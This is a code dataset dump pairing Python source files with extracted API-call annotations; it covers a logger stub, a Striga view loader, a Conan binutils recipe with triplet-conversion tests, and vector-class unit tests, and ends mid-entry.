code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
def main():
pass
|
[
"oslo_log.log.getLogger"
] |
[((44, 71), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (61, 71), True, 'from oslo_log import log as logging\n')]
|
import os, logging as L
import striga.core.exception
import striga.server.application
from ._stsvcsb_utils import PathLimiter, LoabableObject
###
class View(PathLimiter, LoabableObject):
'''
Process bus object that executes Striga views
'''
def __init__(self, rootdir, source, mode, entry = 'main', pathlimit = '==0'):
app = striga.server.application.GetInstance()
loadable = app.Services.Loader.LoadStrigaFile(os.path.abspath(os.path.join(rootdir, source)), buildmode = mode, doload = False)
PathLimiter.__init__(self, pathlimit)
LoabableObject.__init__(self, loadable)
self.Entry = entry
self.EntryPoint = None
def __call__(self, ctx, path, *args, **kwargs):
self.CheckPath(path)
if self.EntryPoint is None:
#TODO: Here is a correct place for lazy loading (when self.LoabableObject.IsLoaded is False and self.LoabableObject.GetError is None)
# - launch worker that will call self.LoabableObject.Load() (retry option bellow must be implemented)
#TODO: Implement error reporting (Striga file is not loaded - can contain error)
#TODO: Handle a possiblity that loader is still running (error in self.LoabableObject is None)
# - wait for some reasonable amount of time and retry
if self.LoabableObject.IsLoaded():
L.warning("Striga view file '%s' is loaded but is doesn't provide striga view interface" % (str(self.LoabableObject)))
raise striga.core.exception.StrigaBusError('NotFound')
L.warning("Striga view '%s' is not loaded (yet) - it is in status '%s'" % (str(self.LoabableObject), self.LoabableObject.GetStatusString()))
raise striga.core.exception.StrigaBusError('NotLoaded')
ctx.res.SetContentType('text/html')
ctx.res.SetCacheAge(0)
out = self.LoabableObject.OutClass(ctx.res.Write)
self.EntryPoint(ctx, out, *args, **kwargs)
def _OnLOLoaded(self, strigafile):
self.EntryPoint = None
module = self.LoabableObject.GetModule()
if not hasattr(module, self.Entry):
L.warning("Striga file '%s' do not contain entry point '%s'" % (str(self.LoabableObject), self.Entry))
return
EntryPoint = getattr(module, self.Entry)
if not callable(EntryPoint):
L.warning("Striga file '%s' entry point '%s' is not callable" % (str(self.LoabableObject), self.Entry))
return
if not hasattr(EntryPoint ,'StrigaViewEntry'):
L.warning("Striga file '%s' entry point '%s' is not Striga entry (use decorator @StrigaViewEntry)" % (str(self.LoabableObject), self.Entry))
return
self.EntryPoint = EntryPoint
L.info("Striga view '%s' loaded" % str(strigafile))
def _OnLOFailed(self, strigafile):
self.EntryPoint = None
L.info("Striga view '%s' unloaded" % str(strigafile))
|
[
"os.path.join"
] |
[((451, 480), 'os.path.join', 'os.path.join', (['rootdir', 'source'], {}), '(rootdir, source)\n', (463, 480), False, 'import os, logging as L\n')]
|
from conans import ConanFile, AutoToolsBuildEnvironment, tools
from conans.errors import ConanInvalidConfiguration
import functools
import os
import re
import typing
import unittest
required_conan_version = ">=1.43.0"
# This recipe includes a selftest to test conversion of os/arch to triplets (and vice verse)
# Run it using `python -m unittest conanfile.py`
class BinutilsConan(ConanFile):
name = "binutils"
description = "The GNU Binutils are a collection of binary tools."
license = "GPL-2.0-or-later"
url = "https://github.com/conan-io/conan-center-index/"
homepage = "https://www.gnu.org/software/binutils"
topics = ("binutils", "ld", "linker", "as", "assembler", "objcopy", "objdump")
settings = "os", "arch", "compiler", "build_type"
_PLACEHOLDER_TEXT = "__PLACEHOLDER__"
options = {
"multilib": [True, False],
"with_libquadmath": [True, False],
"target_arch": "ANY",
"target_os": "ANY",
"target_triplet": "ANY",
"prefix": "ANY",
}
default_options = {
"multilib": True,
"with_libquadmath": True,
"target_arch": _PLACEHOLDER_TEXT, # Initialized in configure, checked in validate
"target_os": _PLACEHOLDER_TEXT, # Initialized in configure, checked in validate
"target_triplet": _PLACEHOLDER_TEXT, # Initialized in configure, checked in validate
"prefix": _PLACEHOLDER_TEXT, # Initialized in configure (NOT config_options, because it depends on target_{arch,os})
}
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _settings_build(self):
return getattr(self, "settings_build", self.settings)
@property
def _settings_target(self):
return getattr(self, "settings_target", None) or self.settings
def export_sources(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
self.copy(patch["patch_file"])
def config_options(self):
del self.settings.compiler.cppstd
del self.settings.compiler.libcxx
def configure(self):
if self.options.target_triplet == self._PLACEHOLDER_TEXT:
if self.options.target_arch == self._PLACEHOLDER_TEXT:
# If target triplet and target arch are not set, initialize it from the target settings
self.options.target_arch = str(self._settings_target.arch)
if self.options.target_os == self._PLACEHOLDER_TEXT:
# If target triplet and target os are not set, initialize it from the target settings
self.options.target_os = str(self._settings_target.os)
# Initialize the target_triplet from the target arch and target os
self.options.target_triplet = _GNUTriplet.from_archos(_ArchOs(arch=str(self.options.target_arch), os=str(self.options.target_os), extra=dict(self._settings_target.values_list))).triplet
else:
gnu_triplet_obj = _GNUTriplet.from_text(str(self.options.target_triplet))
archos = _ArchOs.from_triplet(gnu_triplet_obj)
if self.options.target_arch == self._PLACEHOLDER_TEXT:
# If target arch is not set, deduce it from the target triplet
self.options.target_arch = archos.arch
if self.options.target_os == self._PLACEHOLDER_TEXT:
# If target arch is not set, deduce it from the target triplet
self.options.target_os = archos.os
if self.options.prefix == self._PLACEHOLDER_TEXT:
self.options.prefix = f"{self.options.target_triplet}-"
self.output.info(f"binutils:target_arch={self.options.target_arch}")
self.output.info(f"binutils:target_os={self.options.target_os}")
self.output.info(f"binutils:target_triplet={self.options.target_triplet}")
def validate(self):
if self.settings.compiler in ("msvc", "Visual Studio"):
raise ConanInvalidConfiguration("This recipe does not support building binutils by this compiler")
if self.options.target_os == "Macos":
raise ConanInvalidConfiguration("cci does not support building binutils for Macos since binutils is degraded there (no as/ld + armv8 does not build)")
# Check whether the actual target_arch and target_os option are valid (they should be in settings.yml)
# FIXME: does there exist a stable Conan API to accomplish this?
if self.options.target_arch not in self.settings.arch.values_range:
raise ConanInvalidConfiguration(f"target_arch={self.options.target_arch} is invalid (possibilities={self.settings.arch.values_range})")
if self.options.target_os not in self.settings.os.values_range:
raise ConanInvalidConfiguration(f"target_os={self.options.target_os} is invalid (possibilities={self.settings.os.values_range})")
target_archos = _ArchOs(str(self.options.target_arch), str(self.options.target_os))
target_gnu_triplet = _GNUTriplet.from_text(str(self.options.target_triplet))
if not target_archos.is_compatible(target_gnu_triplet):
suggested_gnu_triplet = _GNUTriplet.from_archos(target_archos)
suggested_archos = _ArchOs.from_triplet(target_gnu_triplet)
raise ConanInvalidConfiguration(f"target_arch={target_archos.arch}/target_os={target_archos.os} is not compatible with {target_gnu_triplet.triplet}. Change target triplet to {suggested_gnu_triplet.triplet}, or change target_arch/target_os to {suggested_archos.arch}/{suggested_archos.os}.")
# Check, when used as build requirement in a cross build, whether the target arch/os agree
settings_target = getattr(self, "settings_target", None)
if settings_target is not None:
if self.options.target_arch != settings_target.arch:
raise ConanInvalidConfiguration(f"binutils:target_arch={self.options.target_arch} does not match target architecture={settings_target.arch}")
if self.options.target_os != settings_target.os:
raise ConanInvalidConfiguration(f"binutils:target_os={self.options.target_os} does not match target os={settings_target.os}")
def package_id(self):
del self.info.settings.compiler
def _raise_unsupported_configuration(self, key, value):
raise ConanInvalidConfiguration(f"This configuration is unsupported by this conan recip. Please consider adding support. ({key}={value})")
def build_requirements(self):
if self._settings_build.os == "Windows" and not tools.get_env("CONAN_BASH_PATH"):
self.build_requires("msys2/cci.latest")
def requirements(self):
self.requires("zlib/1.2.12")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
strip_root=True, destination=self._source_subfolder)
@property
def _exec_prefix(self):
return os.path.join(self.package_folder, "bin", "exec_prefix")
@functools.lru_cache(1)
def _configure_autotools(self):
autotools = AutoToolsBuildEnvironment(self, win_bash=self._settings_build.os == "Windows")
yes_no = lambda tf : "yes" if tf else "no"
conf_args = [
f"--target={self.options.target_triplet}",
f"--enable-multilib={yes_no(self.options.multilib)}",
"--with-system-zlib",
"--disable-nls",
f"--program-prefix={self.options.prefix}",
f"exec_prefix={tools.unix_path(self._exec_prefix)}",
]
autotools.configure(args=conf_args, configure_dir=self._source_subfolder)
return autotools
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
autotools = self._configure_autotools()
autotools.make()
def package(self):
self.copy("COPYING*", src=self._source_subfolder, dst="licenses")
autotools = self._configure_autotools()
autotools.install()
tools.rmdir(os.path.join(self.package_folder, "share"))
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.la")
def package_info(self):
bindir = os.path.join(self.package_folder, "bin")
self.output.info("Appending PATH environment variable: {}".format(bindir))
self.env_info.PATH.append(bindir)
target_bindir = os.path.join(self._exec_prefix, str(self.options.target_triplet), "bin")
self.output.info("Appending PATH environment variable: {}".format(target_bindir))
self.env_info.PATH.append(target_bindir)
self.output.info(f"GNU triplet={self.options.target_triplet}")
self.user_info.gnu_triplet = self.options.target_triplet
self.output.info(f"executable prefix={self.options.prefix}")
self.user_info.prefix = self.options.prefix
# Add recipe path to enable running the self test in the test package.
# Don't use this property in production code. It's unsupported.
self.user_info.recipe_path = os.path.realpath(__file__)
class _ArchOs:
def __init__(self, arch: str, os: str, extra: typing.Optional[typing.Dict[str, str]]=None):
self.arch = arch
self.os = os
self.extra = extra if extra is not None else {}
def is_compatible(self, triplet: "_GNUTriplet") -> bool:
return self.arch in self.calculate_archs(triplet) and self.os == self.calculate_os(triplet)
_MACHINE_TO_ARCH_LUT = {
"arm": "armv7",
"aarch64": ("armv8", "armv9"),
"i386": "x86",
"i486": "x86",
"i586": "x86",
"i686": "x86",
"x86_64": "x86_64",
"riscv32": "riscv32",
"riscv64": "riscv64",
}
@classmethod
def calculate_archs(cls, triplet: "_GNUTriplet") -> typing.Tuple[str]:
if triplet.machine == "arm":
archs = "armv7" + ("hf" if "hf" in triplet.abi else "")
else:
archs = cls._MACHINE_TO_ARCH_LUT[triplet.machine]
if isinstance(archs, str):
archs = (archs, )
return archs
_GNU_OS_TO_OS_LUT = {
None: "baremetal",
"android": "Android",
"mingw32": "Windows",
"linux": "Linux",
"freebsd": "FreeBSD",
"darwin": "Macos",
"none": "baremetal",
"unknown": "baremetal",
}
@classmethod
def calculate_os(cls, triplet: "_GNUTriplet") -> str:
if triplet.abi and "android" in triplet.abi:
return "Android"
return cls._GNU_OS_TO_OS_LUT[triplet.os]
@classmethod
def from_triplet(cls, triplet: "_GNUTriplet") -> "_ArchOs":
archs = cls.calculate_archs(triplet)
os = cls.calculate_os(triplet)
extra = {}
if os == "Android" and triplet.abi:
m = re.match(".*([0-9]+)", triplet.abi)
if m:
extra["os.api_level"] = m.group(1)
# Assume first architecture
return cls(arch=archs[0], os=os, extra=extra)
def __eq__(self, other) -> bool:
if type(self) != type(other):
return False
if not (self.arch == other.arch and self.os == other.os):
return False
self_extra_keys = set(self.extra.keys())
other_extra_keys = set(other.extra.keys())
if (self_extra_keys - other_extra_keys) or (other_extra_keys - self_extra_keys):
return False
return True
def __repr__(self) -> str:
return f"<{type(self).__name__}:arch='{self.arch}',os='{self.os}',extra={self.extra}>"
class _GNUTriplet:
def __init__(self, machine: str, vendor: typing.Optional[str], os: typing.Optional[str], abi: typing.Optional[str]):
self.machine = machine
self.vendor = vendor
self.os = os
self.abi = abi
@property
def triplet(self) -> str:
return "-".join(p for p in (self.machine, self.vendor, self.os, self.abi) if p)
@classmethod
def from_archos(cls, archos: _ArchOs) -> "_GNUTriplet":
gnu_machine = cls.calculate_gnu_machine(archos)
gnu_vendor = cls.calculate_gnu_vendor(archos)
gnu_os = cls.calculate_gnu_os(archos)
gnu_abi = cls.calculate_gnu_abi(archos)
return cls(gnu_machine, gnu_vendor, gnu_os, gnu_abi)
@classmethod
def from_text(cls, text: str) -> "_GNUTriplet":
gnu_machine: str
gnu_vendor: typing.Optional[str]
gnu_os: typing.Optional[str]
gnu_abi: typing.Optional[str]
parts = text.split("-")
if not 2 <= len(parts) <= 4:
raise ValueError("Wrong number of GNU triplet components. Count must lie in range [2, 4]. format=$machine(-$vendor)?(-$os)?(-$abi)?")
gnu_machine = parts[0]
parts = parts[1:]
if any(v in parts[-1] for v in cls.KNOWN_GNU_ABIS):
gnu_abi = parts[-1]
parts = parts[:-1]
else:
gnu_abi = None
if len(parts) == 2:
gnu_vendor = parts[0]
gnu_os = parts[1]
elif len(parts) == 1:
if parts[0] in _GNUTriplet.UNKNOWN_OS_ALIASES:
gnu_vendor = None
gnu_os = parts[0]
elif parts[0] in cls.OS_TO_GNU_OS_LUT.values():
gnu_vendor = None
gnu_os = parts[0]
else:
gnu_vendor = parts[0]
gnu_os = None
else:
gnu_vendor = None
gnu_os = None
return cls(gnu_machine, gnu_vendor, gnu_os, gnu_abi)
ARCH_TO_GNU_MACHINE_LUT = {
"x86": "i686",
"x86_64": "x86_64",
"armv7": "arm",
"armv7hf": "arm",
"armv8": "aarch64",
"riscv32": "riscv32",
"riscv64": "riscv64",
}
@classmethod
def calculate_gnu_machine(cls, archos: _ArchOs) -> str:
return cls.ARCH_TO_GNU_MACHINE_LUT[archos.arch]
UNKNOWN_OS_ALIASES = (
"unknown",
"none",
)
OS_TO_GNU_OS_LUT = {
"baremetal": "none",
"Android": "linux",
"FreeBSD": "freebsd",
"Linux": "linux",
"Macos": "darwin",
"Windows": "mingw32",
}
@classmethod
def calculate_gnu_os(cls, archos: _ArchOs) -> typing.Optional[str]:
if archos.os in ("baremetal", ):
if archos.arch in ("x86", "x86_64", ):
return None
elif archos.arch in ("riscv32", "riscv64"):
return "unknown"
return cls.OS_TO_GNU_OS_LUT[archos.os]
OS_TO_GNU_VENDOR_LUT = {
"Windows": "w64",
"baremetal": None,
}
@classmethod
def calculate_gnu_vendor(cls, archos: _ArchOs) -> typing.Optional[str]:
if archos.os in ("baremetal", "Android"):
return None
if archos.os in ("Macos", "iOS", "tvOS", "watchOS"):
return "apple"
return cls.OS_TO_GNU_VENDOR_LUT.get(archos.os, "pc")
@classmethod
def calculate_gnu_abi(self, archos: _ArchOs) -> typing.Optional[str]:
if archos.os in ("baremetal", ):
if archos.arch in ("armv7",):
return "eabi"
else:
return "elf"
abi_start = None
if archos.os in ("Linux", ):
abi_start = "gnu"
elif archos.os in ("Android", ):
abi_start = "android"
else:
return None
if archos.arch in ("armv7",):
abi_suffix = "eabi"
elif archos.arch in ("armv7hf",):
abi_suffix = "eabihf"
else:
abi_suffix = ""
if archos.os in ("Android", ):
abi_suffix += str(archos.extra.get("os.api_level", ""))
return abi_start + abi_suffix
KNOWN_GNU_ABIS = (
"android",
"gnu",
"eabi",
"elf",
)
def __eq__(self, other: object) -> bool:
if type(self) != type(other):
return False
other: "_GNUTriplet"
return self.machine == other.machine and self.vendor == other.vendor and self.os == other.os and self.abi == other.abi
def __repr__(self) -> str:
def x(v):
if v is None:
return None
return f"'{v}'"
return f"<{type(self).__name__}:machine={x(self.machine)},vendor={x(self.vendor)},os={x(self.os)},abi={x(self.abi)}>"
class _TestOsArch2GNUTriplet(unittest.TestCase):
def test_linux_x86(self):
archos = _ArchOs(arch="x86", os="Linux")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="i686", vendor="pc", os="linux", abi="gnu"), "i686-pc-linux-gnu")
self.assertEqual(_ArchOs("x86", "Linux"), _ArchOs.from_triplet(_GNUTriplet.from_text("i386-linux")))
self.assertEqual(_ArchOs("x86", "Linux"), _ArchOs.from_triplet(_GNUTriplet.from_text("i686-linux")))
self.assertEqual(_GNUTriplet("i486", None, "linux", None), _GNUTriplet.from_text("i486-linux"))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("i486-linux")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("i486-linux-gnu")))
def test_linux_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Linux"), _GNUTriplet(machine="x86_64", vendor="pc", os="linux", abi="gnu"), "x86_64-pc-linux-gnu")
def test_linux_armv7(self):
archos = _ArchOs(arch="armv7", os="Linux")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="arm", vendor="pc", os="linux", abi="gnueabi"), "arm-pc-linux-gnueabi")
self.assertEqual(_GNUTriplet("arm", "pc", None, "gnueabi"), _GNUTriplet.from_text("arm-pc-gnueabi"))
self.assertEqual(_GNUTriplet("arm", "pc", None, "eabi"), _GNUTriplet.from_text("arm-pc-eabi"))
self.assertEqual(_ArchOs("armv7hf", "baremetal"), _ArchOs.from_triplet(_GNUTriplet.from_text("arm-pc-gnueabihf")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-linux-gnueabi")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-linux-eabi")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-pc-linux-gnueabihf")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-pc-gnueabihf")))
def test_linux_armv7hf(self):
archos = _ArchOs(arch="armv7hf", os="Linux")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="arm", vendor="pc", os="linux", abi="gnueabihf"), "arm-pc-linux-gnueabihf")
self.assertEqual(_GNUTriplet("arm", "pc", None, "gnueabihf"), _GNUTriplet.from_text("arm-pc-gnueabihf"))
self.assertEqual(_ArchOs("armv7", "baremetal"), _ArchOs.from_triplet(_GNUTriplet.from_text("arm-pc-gnueabi")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-linux-gnueabi")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-linux-eabi")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-pc-linux-gnueabihf")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-pc-gnueabihf")))
def test_windows_x86(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86", os="Windows"), _GNUTriplet(machine="i686", vendor="w64", os="mingw32", abi=None), "i686-w64-mingw32")
def test_windows_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Windows"), _GNUTriplet(machine="x86_64", vendor="w64", os="mingw32", abi=None), "x86_64-w64-mingw32")
def test_macos_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Macos"), _GNUTriplet(machine="x86_64", vendor="apple", os="darwin", abi=None), "x86_64-apple-darwin")
def test_freebsd_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="FreeBSD"), _GNUTriplet(machine="x86_64", vendor="pc", os="freebsd", abi=None), "x86_64-pc-freebsd")
def test_baremetal_x86(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86", os="baremetal"), _GNUTriplet(machine="i686", vendor=None, os=None, abi="elf"), "i686-elf")
def test_baremetal_x86_64(self):
archos = _ArchOs(arch="x86_64", os="baremetal")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="x86_64", vendor=None, os=None, abi="elf"), "x86_64-elf")
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("x86_64-elf")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("x86_64-none-elf")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("x86_64-unknown-elf")))
def test_baremetal_armv7(self):
archos = _ArchOs(arch="armv7", os="baremetal")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="arm", vendor=None, os="none", abi="eabi"), "arm-none-eabi")
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-none-eabi")))
def test_baremetal_armv8(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="armv8", os="baremetal"), _GNUTriplet(machine="aarch64", vendor=None, os="none", abi="elf"), "aarch64-none-elf")
def test_baremetal_riscv32(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="riscv32", os="baremetal"), _GNUTriplet(machine="riscv32", vendor=None, os="unknown", abi="elf"), "riscv32-unknown-elf")
def test_baremetal_riscv64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="riscv64", os="baremetal"), _GNUTriplet(machine="riscv64", vendor=None, os="unknown", abi="elf"), "riscv64-unknown-elf")
def test_android_armv7(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="armv7", os="Android", extra={"os.api_level": "31"}), _GNUTriplet(machine="arm", vendor=None, os="linux", abi="androideabi31"), "arm-linux-androideabi31")
def test_android_armv8(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="armv8", os="Android", extra={"os.api_level": "24"}), _GNUTriplet(machine="aarch64", vendor=None, os="linux", abi="android24"), "aarch64-linux-android24")
def test_android_x86(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86", os="Android", extra={"os.api_level": "16"}), _GNUTriplet(machine="i686", vendor=None, os="linux", abi="android16"), "i686-linux-android16")
def test_android_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Android", extra={"os.api_level": "29"}), _GNUTriplet(machine="x86_64", vendor=None, os="linux", abi="android29"), "x86_64-linux-android29")
self.assertEqual(_ArchOs(arch="x86_64", os="Android", extra={"os.api_level": "25"}), _ArchOs.from_triplet(_GNUTriplet.from_text("x86_64-linux-android29")))
def _test_osarch_to_gnutriplet(self, archos: _ArchOs, gnuobj_ref: _GNUTriplet, triplet_ref: str):
gnuobj = _GNUTriplet.from_archos(archos)
self.assertEqual(gnuobj_ref, gnuobj)
self.assertEqual(triplet_ref, gnuobj.triplet)
self.assertEqual(gnuobj_ref, _GNUTriplet.from_text(triplet_ref))
# self.assertEqual(triplet_ref, tools.get_gnu_triplet(archos.os, archos.arch, compiler="gcc"))
|
[
"conans.tools.get",
"conans.tools.unix_path",
"os.path.realpath",
"re.match",
"conans.tools.patch",
"conans.AutoToolsBuildEnvironment",
"conans.errors.ConanInvalidConfiguration",
"conans.tools.get_env",
"functools.lru_cache",
"os.path.join"
] |
[((7022, 7044), 'functools.lru_cache', 'functools.lru_cache', (['(1)'], {}), '(1)\n', (7041, 7044), False, 'import functools\n'), ((6370, 6512), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""This configuration is unsupported by this conan recip. Please consider adding support. ({key}={value})"""'], {}), "(\n f'This configuration is unsupported by this conan recip. Please consider adding support. ({key}={value})'\n )\n", (6395, 6512), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((6777, 6887), 'conans.tools.get', 'tools.get', ([], {'strip_root': '(True)', 'destination': 'self._source_subfolder'}), "(**self.conan_data['sources'][self.version], strip_root=True,\n destination=self._source_subfolder)\n", (6786, 6887), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((6960, 7015), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""', '"""exec_prefix"""'], {}), "(self.package_folder, 'bin', 'exec_prefix')\n", (6972, 7015), False, 'import os\n'), ((7101, 7179), 'conans.AutoToolsBuildEnvironment', 'AutoToolsBuildEnvironment', (['self'], {'win_bash': "(self._settings_build.os == 'Windows')"}), "(self, win_bash=self._settings_build.os == 'Windows')\n", (7126, 7179), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((8252, 8292), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""'], {}), "(self.package_folder, 'bin')\n", (8264, 8292), False, 'import os\n'), ((9103, 9129), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (9119, 9129), False, 'import os\n'), ((3979, 4076), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""This recipe does not support building binutils by this compiler"""'], {}), "(\n 'This recipe does not support building binutils by this compiler')\n", (4004, 4076), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4137, 4291), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""cci does not support building binutils for Macos since binutils is degraded there (no as/ld + armv8 does not build)"""'], {}), "(\n 'cci does not support building binutils for Macos since binutils is degraded there (no as/ld + armv8 does not build)'\n )\n", (4162, 4291), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4561, 4700), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""target_arch={self.options.target_arch} is invalid (possibilities={self.settings.arch.values_range})"""'], {}), "(\n f'target_arch={self.options.target_arch} is invalid (possibilities={self.settings.arch.values_range})'\n )\n", (4586, 4700), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4781, 4914), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""target_os={self.options.target_os} is invalid (possibilities={self.settings.os.values_range})"""'], {}), "(\n f'target_os={self.options.target_os} is invalid (possibilities={self.settings.os.values_range})'\n )\n", (4806, 4914), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((5312, 5606), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""target_arch={target_archos.arch}/target_os={target_archos.os} is not compatible with {target_gnu_triplet.triplet}. Change target triplet to {suggested_gnu_triplet.triplet}, or change target_arch/target_os to {suggested_archos.arch}/{suggested_archos.os}."""'], {}), "(\n f'target_arch={target_archos.arch}/target_os={target_archos.os} is not compatible with {target_gnu_triplet.triplet}. Change target triplet to {suggested_gnu_triplet.triplet}, or change target_arch/target_os to {suggested_archos.arch}/{suggested_archos.os}.'\n )\n", (5337, 5606), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((7787, 7807), 'conans.tools.patch', 'tools.patch', ([], {}), '(**patch)\n', (7798, 7807), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((8076, 8118), 'os.path.join', 'os.path.join', (['self.package_folder', '"""share"""'], {}), "(self.package_folder, 'share')\n", (8088, 8118), False, 'import os\n'), ((8156, 8196), 'os.path.join', 'os.path.join', (['self.package_folder', '"""lib"""'], {}), "(self.package_folder, 'lib')\n", (8168, 8196), False, 'import os\n'), ((10863, 10898), 're.match', 're.match', (['""".*([0-9]+)"""', 'triplet.abi'], {}), "('.*([0-9]+)', triplet.abi)\n", (10871, 10898), False, 'import re\n'), ((5889, 6034), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""binutils:target_arch={self.options.target_arch} does not match target architecture={settings_target.arch}"""'], {}), "(\n f'binutils:target_arch={self.options.target_arch} does not match target architecture={settings_target.arch}'\n )\n", (5914, 6034), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((6108, 6237), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""binutils:target_os={self.options.target_os} does not match target os={settings_target.os}"""'], {}), "(\n f'binutils:target_os={self.options.target_os} does not match target os={settings_target.os}'\n )\n", (6133, 6237), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((6594, 6626), 'conans.tools.get_env', 'tools.get_env', (['"""CONAN_BASH_PATH"""'], {}), "('CONAN_BASH_PATH')\n", (6607, 6626), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((7519, 7553), 'conans.tools.unix_path', 'tools.unix_path', (['self._exec_prefix'], {}), '(self._exec_prefix)\n', (7534, 7553), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n')]
|
import unittest
from homeworks.homework_1.task_1.vector import Vector
class VectorTest(unittest.TestCase):
def test_empty_vector(self):
with self.assertRaises(ValueError):
self.assertEqual(Vector([]).length(), 0)
def test_int_length(self):
self.assertEqual(Vector([3, 4]).length(), 5)
def test_float_length(self):
self.assertAlmostEqual(Vector([0.1, 4, 3.5]).length(), 5.316013544)
def test_different_dimensions_scalar_product(self):
with self.assertRaises(ValueError):
Vector([1, 2]).scalar_product(Vector([1, 3, 4]))
def test_int_scalar_product(self):
self.assertEqual(Vector([2, 3]).scalar_product(Vector([1, 4])), 14)
def test_float_scalar_product(self):
first_v = Vector([3.5, 1.74, 0.896, 0.445])
second_v = Vector([1, -2.97, -1.065, -3.29])
self.assertAlmostEqual(first_v.scalar_product(second_v), -4.08609)
def test_self_scalar_product(self):
self.assertAlmostEqual(Vector([1, -2.97, -1.065]).scalar_product(Vector([1, -2.97, -1.065])), 10.955125)
def test_different_dimensions_angle(self):
with self.assertRaises(ValueError):
Vector([1, 2]).angle(Vector([1, 3, 4]))
def test_float_angle(self):
first_v = Vector([3.5, 1.74, 0.896, 0.445])
second_v = Vector([1, -2.97, -1.065, -3.29])
self.assertAlmostEqual(first_v.angle(second_v), 102.53349294109442)
def test_self_angle(self):
self.assertAlmostEqual(Vector([1, -2.97, -1.065]).angle(Vector([1, -2.97, -1.065])), 0.0)
|
[
"homeworks.homework_1.task_1.vector.Vector"
] |
[((773, 806), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[3.5, 1.74, 0.896, 0.445]'], {}), '([3.5, 1.74, 0.896, 0.445])\n', (779, 806), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((826, 859), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065, -3.29]'], {}), '([1, -2.97, -1.065, -3.29])\n', (832, 859), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1284, 1317), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[3.5, 1.74, 0.896, 0.445]'], {}), '([3.5, 1.74, 0.896, 0.445])\n', (1290, 1317), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1337, 1370), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065, -3.29]'], {}), '([1, -2.97, -1.065, -3.29])\n', (1343, 1370), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((578, 595), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 3, 4]'], {}), '([1, 3, 4])\n', (584, 595), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((692, 706), 'homeworks.homework_1.task_1.vector.Vector', 